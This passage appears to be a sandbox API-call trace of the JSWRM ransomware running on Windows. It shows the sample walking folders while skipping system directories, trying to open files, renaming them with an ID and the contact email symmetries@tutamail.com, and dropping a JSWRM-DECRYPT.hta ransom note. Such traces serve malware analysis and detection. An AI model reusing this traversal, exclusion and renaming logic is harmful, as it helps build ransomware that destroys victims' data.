lstrcmpiW (lpString1="TipTsf.dll.mui", lpString2="perflogs") returned 1 [0067.886] lstrcmpiW (lpString1="TipTsf.dll.mui", lpString2="documents and settings") returned 1 [0067.886] lstrcmpiW (lpString1="TipTsf.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.886] lstrcmpiW (lpString1="TipTsf.dll.mui", lpString2="system volume information") returned 1 [0067.886] lstrcmpiW (lpString1="TipTsf.dll.mui", lpString2="msocache") returned 1 [0067.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0067.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipTsf.dll.mui", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipTsf.dll.mui", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TipTsf.dll.mui", lpUsedDefaultChar=0x0) returned 14 [0067.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0067.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0067.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipTsf.dll.mui", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipTsf.dll.mui", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TipTsf.dll.mui", lpUsedDefaultChar=0x0) returned 14 [0067.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0067.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0067.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.887] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.887] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10049536280073920) returned 0 [0067.887] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.887] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.887] CloseHandle (hObject=0xffffffff) returned 1 [0067.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0067.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0067.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0067.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0067.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0067.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.887] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0067.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.888] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dad75cd, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7d250300, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipTsf.dll.mui", cAlternateFileName="")) returned 0 [0067.888] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0067.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0067.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0067.888] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05ddf5c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="es-ES", cAlternateFileName="")) returned 1 [0067.888] lstrcmpiW (lpString1="es-ES", lpString2=".") returned 1 [0067.888] lstrcmpiW (lpString1="es-ES", lpString2="..") returned 1 [0067.888] lstrcmpiW (lpString1="es-ES", lpString2="...") returned 1 [0067.888] lstrcmpiW (lpString1="es-ES", lpString2="windows") returned -1 [0067.888] lstrcmpiW (lpString1="es-ES", lpString2="recovery") returned -1 [0067.888] lstrcmpiW (lpString1="es-ES", lpString2="perflogs") returned -1 [0067.888] lstrcmpiW (lpString1="es-ES", lpString2="documents and settings") returned 1 [0067.888] lstrcmpiW (lpString1="es-ES", lpString2="$RECYCLE.BIN") returned 1 [0067.888] lstrcmpiW (lpString1="es-ES", lpString2="system volume information") returned -1 [0067.888] lstrcmpiW (lpString1="es-ES", lpString2="msocache") returned -1 [0067.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0067.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0067.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.889] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\jswrm-decrypt.hta")) returned 0xffffffff [0067.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0067.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0067.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0067.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0067.889] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.890] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.890] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0067.891] CloseHandle (hObject=0x454) returned 1 [0067.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0067.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0067.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0067.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0067.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0067.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0067.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0067.892] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\jswrm-decrypt.hta")) returned 0x20 [0067.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0067.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0067.892] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05ddf5c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f202223, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0067.892] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.892] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05ddf5c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f202223, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.892] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.892] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.892] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f202223, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f202223, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f202223, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0067.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0067.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0067.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0067.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0067.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0067.893] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0067.893] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0067.893] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0067.893] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0067.893] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0067.893] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0067.893] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0067.893] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0067.893] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.893] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0067.893] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0067.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0067.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0067.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0067.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0067.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0067.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0067.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0067.893] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.894] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10088190985885816) returned 0 [0067.894] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.894] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.894] CloseHandle (hObject=0xffffffff) returned 1 [0067.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0067.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0067.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0067.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0067.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0067.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0067.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.894] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: 